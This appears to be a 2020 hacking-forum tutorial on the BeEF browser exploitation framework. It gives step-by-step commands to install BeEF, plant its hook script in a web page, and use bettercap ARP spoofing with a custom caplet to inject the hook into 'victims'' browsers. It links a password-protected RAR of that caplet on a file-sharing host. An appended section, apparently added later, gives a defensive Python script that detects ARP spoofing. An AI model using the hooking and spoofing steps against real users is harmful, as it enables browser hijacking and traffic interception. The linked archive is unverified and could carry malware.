What is BeEF Framework? How to use? (Exploiting Browsers Tool)


Participant Member
1 May 2020
Beacon Hills

What is BeEF?

In this topic, we will examine a tool called BeEF. BeEF stands for Browser Exploitation Framework; it is a tool for exploiting browsers.

Hackers use this tool to run JavaScript code in the target computer's browser.

BeEF consists of 3 layers.

1- Personal computers of the attacker or attackers
2- The server where BeEF is installed
3- The targets

How to Install BeEF on Kali Linux?

We open the terminal and type this:

git clone https://github.com/beefproject/beef


After the clone is finished, we type ls in the terminal and see the beef folder.


We type cd beef to go into the beef folder.

We run ./install once, answer "y" to the questions and press Enter.


Now, whenever we restart the system, it is enough to run "cd beef" and then "./beef".


The error here is asking us to change the username and password in BeEF.

For this, we type nano config.yaml in the terminal.


After the user and passwd are changed, we press "CTRL-O", "Enter" and "CTRL-X" to save and exit.

To log in to BeEF, after running ./beef you can click one of the addresses shown below.


Friends, I will demonstrate on an Apache server so that you can understand the basics of BeEF.

First of all, I will create a website using the Apache service in Linux.

This is for example purposes only; you can think more creatively and hook your victims.

For this, I go to the console and type service apache2 start.

Then I edit the index page of my site, which is at /var/www/index.html.

We open index.html with leafpad or another application and paste the code <script src = ""> </script> into it. You need to write your own IP address instead of



To learn our own IP, we go to the terminal and type ifconfig. Mine is so I write the code like this: <script src = ""> </script>


Yes, our target has taken the bait. The victim has to stay on the site for a long time in order for us to reach our goal.


We will inject JavaScript code into our victim's browser so that we can access it even if the victim leaves our site.

For this, we will use bettercap, which is available in Kali Linux.

First you need to download the file named beefcustom.zip that I gave below the topic.

We put the beefcustom folder from the downloaded RAR file into the /usr/share/bettercap/caplets directory.

Open the file named beefcustom.cap in the beefcustom folder with leafpad or another application.


Instead of the IP where it says set arp.spoof.targets, we write the IPs of our victim.

Then we open the file named beefcustom.js in the same way, write our own IP address instead of, save and close.


To run bettercap, we type bettercap -iface eth0 -caplet /usr/share/bettercap/caplets/beefcustom/beefcustom.cap in the terminal.


Yes, now the victim is online. Let's try our commands in the victim's browser; for this, we click on the Commands section shown in the photo below.


The green ones mean they will work, the red ones mean they are less likely to work.

I click on the Browser section under Commands; there is a command called Create Alert Dialog in Hooked Domain. Let's try it; it will send a warning message to our victim.


Yes, we have a warning message.


BEEF CUSTOM DOWNLOAD LINK:https://www.dosyaupload.com/cgZ8

RAR PASS : pytang

VIRUS TOTAL :https://www.virustotal.com/gui/file...23f57240b2e6273c6b5ed04edb1168a8056/detection
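
The bettercap step above depends on ARP spoofing (set arp.spoof.targets), which leaves a visible trace in a host's neighbor table. The following is an added example, not part of the original post: a Python check over `ip neigh show` output that flags a changed gateway MAC and one MAC answering for several IPs. The sample table, the addresses and the known gateway MAC are constructed assumptions.

```python
import re
from collections import defaultdict

# Constructed sample of `ip neigh show` output (not from the original post).
# 192.168.1.1 is assumed to be the gateway; 192.168.1.50 is a host whose MAC
# is now also being reported for the gateway address.
SAMPLE_NEIGH = """\
192.168.1.1 dev eth0 lladdr 08:00:27:aa:bb:cc REACHABLE
192.168.1.20 dev eth0 lladdr 52:54:00:11:22:33 STALE
192.168.1.50 dev eth0 lladdr 08:00:27:aa:bb:cc REACHABLE
192.168.1.77 dev eth0 FAILED
"""

NEIGH_RE = re.compile(r"^(\S+) dev (\S+) lladdr ([0-9a-fA-F:]{17})\b")

def parse_neigh(text):
    """Return {ip: mac} for entries that have a resolved link-layer address."""
    table = {}
    for line in text.splitlines():
        m = NEIGH_RE.match(line.strip())
        if m:  # FAILED/INCOMPLETE entries have no lladdr and are skipped
            table[m.group(1)] = m.group(3).lower()
    return table

def shared_macs(table):
    """Return {mac: [ips]} for every MAC that answers for more than one IP."""
    by_mac = defaultdict(list)
    for ip, mac in table.items():
        by_mac[mac].append(ip)
    return {mac: sorted(ips) for mac, ips in by_mac.items() if len(ips) > 1}

def check(table, gateway_ip, known_gateway_mac):
    """Compare the table against a gateway MAC recorded while the LAN was trusted."""
    findings = []
    current = table.get(gateway_ip)
    if current and current != known_gateway_mac.lower():
        findings.append(f"gateway {gateway_ip} changed: {known_gateway_mac} -> {current}")
    # Multi-homed hosts and proxy ARP can share a MAC legitimately; review hits.
    for mac, ips in shared_macs(table).items():
        findings.append(f"{mac} answers for multiple IPs: {', '.join(ips)}")
    return findings

if __name__ == "__main__":
    # 00:11:22:33:44:55 is a constructed "known good" gateway MAC.
    for finding in check(parse_neigh(SAMPLE_NEIGH), "192.168.1.1", "00:11:22:33:44:55"):
        print(finding)
```

On a live host, feed the function the real output of `ip neigh show` and a gateway MAC recorded in advance.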


